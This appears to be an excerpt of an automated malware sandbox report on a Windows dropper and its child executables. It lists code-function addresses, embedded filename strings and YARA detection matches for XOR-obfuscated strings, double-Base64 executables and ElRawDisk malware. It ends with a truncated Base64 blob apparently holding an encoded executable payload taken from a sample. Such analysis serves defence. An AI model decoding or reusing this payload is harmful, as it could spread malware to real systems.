      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_0047E2DC
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_0042E2FC
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_004543D0
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_004783F0
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_0045A4F1
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_00438570
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_00468530
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_004165AB
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_00426692
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_00478885
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_00478C23
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_00452C31
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_0043CFE3
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_00478FF5
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_0047F0D0
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_004310A3
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_0047D15E
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_00465260
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_00429348
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_004793DD
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_0047D6AF
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_0045976E
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeCode function: 6_2_014717F7
      Source: C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exeCode function: 7_2_00408F20
      Source: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exeCode function: 8_2_00C6C284
      Source: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exeCode function: 8_2_00C64568
      Source: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exeCode function: 8_2_00C6E641
      Source: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exeCode function: 8_2_00C6E650
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: String function: 01252ED0 appears 39 times
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: String function: 0128A42C appears 39 times
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeCode function: String function: 0040E1D8 appears 44 times
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: String function: 0046E270 appears 50 times
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: String function: 0042A1C4 appears 97 times
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: String function: 00404694 appears 125 times
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: String function: 0046834C appears 34 times
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: String function: 00468161 appears 41 times
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: String function: 00401016 appears 52 times
      Source: file9[1].exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: yevbZfdCqR.exe, 00000001.00000002.752819876.0000000004B30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs yevbZfdCqR.exe
      Source: yevbZfdCqR.exe, 00000001.00000003.653217379.0000000005DFD000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemfx_mft_vp9vd.dllB vs yevbZfdCqR.exe
      Source: yevbZfdCqR.exe, 00000001.00000002.752950283.0000000004BB0000.00000002.00000001.sdmpBinary or memory string: originalfilename vs yevbZfdCqR.exe
      Source: yevbZfdCqR.exe, 00000001.00000002.752950283.0000000004BB0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs yevbZfdCqR.exe
      Source: yevbZfdCqR.exe, 00000001.00000003.647771339.0000000005DE1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameLandscaped.exe4 vs yevbZfdCqR.exe
      Source: yevbZfdCqR.exe, 00000001.00000002.748519721.0000000000F10000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dll.muij% vs yevbZfdCqR.exe
      Source: yevbZfdCqR.exe, 00000001.00000002.749490073.0000000000F20000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs yevbZfdCqR.exe
      Source: yevbZfdCqR.exe, 00000001.00000002.748502456.0000000000F00000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dllj% vs yevbZfdCqR.exe
      Source: yevbZfdCqR.exe, 00000001.00000002.752871216.0000000004B50000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs yevbZfdCqR.exe
      Source: C:\Users\user\Documents\Xl5_fidIgZFRU48uwkdfjZGj.exeSection loaded: starttiledata.dll
      Source: C:\Program Files (x86)\Company\NewProduct\jingzhang.exeSection loaded: starttiledata.dll
      Source: yevbZfdCqR.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
      Source: 00000025.00000000.966814169.000001DA29CD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
      Source: 00000010.00000003.679617471.00000000020C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 00000010.00000000.840587926.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 00000010.00000000.753598266.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 00000006.00000002.754891811.0000000003F75000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
      Source: 00000010.00000000.946369604.000000000063A000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 00000010.00000000.766043822.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 00000010.00000000.762967714.000000000063A000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 00000010.00000000.739471519.00000000005F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 00000010.00000002.1003205218.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 00000010.00000000.766714248.00000000005F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 00000010.00000000.718558359.00000000005F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 00000025.00000003.822255696.000001DA29C60000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
      Source: 00000019.00000002.735071284.00000000005B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
      Source: 00000010.00000000.759921983.00000000005F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 00000010.00000000.722503902.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 00000010.00000002.1003466769.00000000005F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 00000010.00000000.773475326.000000000063A000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 00000010.00000000.742326442.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 00000010.00000000.725474792.000000000063A000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 00000010.00000002.1003521614.000000000063A000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 00000010.00000000.840920801.000000000063A000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 00000010.00000000.840850532.00000000005F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 00000010.00000000.744015353.000000000063A000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 00000010.00000000.921076949.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 00000010.00000000.705454896.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 00000010.00000000.767127574.000000000063A000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 00000010.00000000.933364985.00000000005F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 00000010.00000000.766966642.00000000005F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: Process Memory Space: YX7wpjoMI0vZoMwVbFh9XNIC.exe PID: 4240, type: MEMORYMatched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
      Source: 16.3.BqbASL8ovE3o_gRiKrvwENXN.exe.20c0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.400000.12.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.5f0e50.28.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.5f0e50.11.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 16.2.BqbASL8ovE3o_gRiKrvwENXN.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.5f0e50.6.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.5f0e50.2.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 37.0.svchost.exe.1da29cd0000.4.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
      Source: 16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.400000.27.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.400000.19.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.5f0e50.14.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.5f0e50.6.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 19.3.KyTQCmNmjazMZrvIWzjrSsQG.exe.3def220.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.5f0e50.14.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.400000.27.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 37.0.svchost.exe.1da29cd0000.4.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
      Source: 19.3.KyTQCmNmjazMZrvIWzjrSsQG.exe.3de7620.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.400000.19.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 16.2.BqbASL8ovE3o_gRiKrvwENXN.exe.5f0e50.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 16.3.BqbASL8ovE3o_gRiKrvwENXN.exe.20c0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.5f0e50.20.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 16.2.BqbASL8ovE3o_gRiKrvwENXN.exe.5f0e50.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.5f0e50.2.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.5f0e50.13.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.5f0e50.13.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 19.3.KyTQCmNmjazMZrvIWzjrSsQG.exe.3decfc0.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.5f0e50.11.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 16.2.BqbASL8ovE3o_gRiKrvwENXN.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.5f0e50.28.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.5f0e50.20.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 6.0.YX7wpjoMI0vZoMwVbFh9XNIC.exe.bf0000.0.unpack, SystemSecurityCryptographyCAPIBaseCMSGCMSRECIPIENTINFO30299.csBase64 encoded string: 'VNetWebRequest77765FZxUUFBTUFBQUFFQUFBQS8vOEFBTGdBQUFBQUFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFnQUFBQUE0ZnVnNEF0QW5OSWJnQlRNMGhWR2hwY3lCd2NtOW5jbUZ0SUdOaGJtNXZkQ0JpWlNCeWRXNGdhVzRnUkU5VElHMXZaR1V1RFEwS0pBQUFBQUFBQUFCUVJRQUFUQUVEQU0zc3lLZ0FBQUFBQUFBQUFPQUFBZ0VMQVRBQUFHd0JBQUFNQUFBQUFBQUFNbjRCQUFBZ0FBQUFvQUVBQUFCQUFBQWdBQUFBQkFBQUJBQUFBQUFBQUFBRUFBQUFBQUFBQUFEZ0FRQUFCQUFBQUFBQUFBSUFRSVVBQUJBQUFCQUFBQUFBRUFBQUVBQUFBQUFBQUJBQUFBQUFBQUFBQUFBQUFPQjlBUUJQQUFBQUFLQUJBTlFFQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU1BQkFBd0FBQURFZlFFQUhBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUlBQUFDQUFBQUFBQUFBQUFBQUFBQ0NBQUFFZ0FBQUFBQUFBQUFBQUFBQzUwWlhoMEFBQUE2R3NCQUFBZ0FBQUFiQUVBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQ0FBQUdBdWNuTnlZd0FBQU5RRUFBQUFvQUVBQUFnQUFBQndBUUFBQUFBQUFBQUFBQUFBQUFCQUFBQkFMbkpsYkc5akFBQU1BQUFBQU1BQkFBQUVBQUFBZUFFQUFBQUFBQUFBQUFBQUFBQUFRQUFBUWdBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQlIrQVFBQUFBQUFTQUFBQUFJQUJRQ2NvZ0FBS05zQUFBTUFBQUF6QUFBR0FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFHekFKQVB3Q0FBQUJBQUFSY3c4QUFBb0tBbjRIQVFBRUpTMFhKbjRHQVFBRS9nYStBUUFHY3hBQUFBb2xnQWNCQUFRb0FRQUFLMjhTQUFBS0N6aW9BZ0FBQjI4VEFBQUtGeGNaalVVQUFBRWxGaDhLalVZQUFBRWwwT1lBQUFRb0ZBQUFDbk1WQUFBS29pVVhIbzFHQ